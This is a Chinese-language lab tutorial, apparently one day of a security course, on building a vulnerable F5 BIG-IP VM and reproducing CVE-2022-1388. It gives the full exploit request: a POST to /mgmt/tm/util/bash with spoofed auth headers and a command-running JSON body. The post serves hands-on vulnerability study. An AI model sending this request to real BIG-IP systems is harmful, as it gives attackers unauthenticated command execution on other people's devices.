• 第八天要額外建置一個特殊的環境叫F5 Big-IP，一樣先針對漏洞資訊做個整理。

• 漏洞相關資訊

  • 漏洞編號 : CVE-2022-1388
  • CVSS 3.0 分數 : 9.8 CRITICAL
  • 漏洞類型 : RCE(Remote Code Execution)
  • 使用版本資訊
    • F5-BigIP 16.1.0
  • 漏洞先備知識 :
    • 基本HTTP及網站運作概念
    • Postman
  • 漏洞收穫技能 :
    • F5-BigIP 環境建置方式

• F5 BigIP 是一套可以作為負載均衡器(load balancer)的系統，透過它可以將使用者的連線請求分散到後端的伺服器，藉此擴充系統的最大使用率。但這次的弱點居然出現在它的管理介面上，而且不需要認證就能夠進行RCE攻擊。

• 我們先來看看這次個攻擊payload長相。可以發現不太困難，只要一個HTTP POST 請求就能夠達成。所以這次我們會額外安裝Postman 來進行測試。

資料來源 : Let's drop CVE-2022-1388 PoC

建置弱點環境步驟如下 :

1. 下載 F5 Big-IP 弱點版本 16.1.0 (https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v16.x&ver=16.1.0)
2. 打開 VMware Player，按下Open a Virtual Machine 匯入ova檔案
3. 把四張網卡都調整成是 NAT 模式
4. 開機，並依照預設帳號密碼做登入 (root/default)
5. route -n #在之前建立的 ubuntu 工作機上確認 default gateway
6. config #在F5上執行設定IP，選擇 IPv4，並且確認是否能夠自動抓取設定 ex: 192.168.75.164
7. 透過瀏覽器連接 F5 Big-IP 首頁，https://IP位址
8. 下載 Postman 後，解壓縮後開啟(https://www.postman.com/downloads/)
9. 打開 Postman 進行帳號密碼登入，新建立一個Workspace 並依照 POC 內容建立請求，完成這次的攻擊。
10. HTTP 請求方法調整成 POST
11. URL 改成 https://IP位址/mgmt/tm/util/bash
12. 新增 HTTP header (Host: localhost、X-F5-Auth-Token: a、Authorization: Basic YWRtaW46、Connection: keep-alive, X-F5-Auth-Token、Content-Type: application/json)
13. 內容請求如下 :

{
	"command":"run",
	"utilCmdArgs":"-c id"
}

• F5 Big-IP 的弱點只是要讓大家了解到這樣的特殊系統其實也是可以透過虛擬機器建立起來的。如果對漏洞原理有想要了解的話，可以參考 F5 iControl REST Endpoint Authentication Bypass Technical Deep Dive 這篇文章。

• 最後針對 Log4Shell、Spring4Shell、F5 Big-IP 這三個RCE弱點的攻擊流程做個總結。
  

• 延伸閱讀

  • 粗暴地注入F5 Big-IP 達到RCE的漏洞，真有那麼神奇嗎? (CVE-2022-1388) (含POC)
  • 這才是蒸的Pre-Auth!!! 感謝網友幫忙~~ 完全體三刀流育正葛葛大戰 F5 Big-IP (CVE-2022-1388) (含POC)

Spring4Shell 回家作業解答 :

1. cat ./conf/server.xml #從容器內找出原本的設定數值
2. 呼叫 curl 直接設定回原本數值
3. 確認 log 是否恢復正常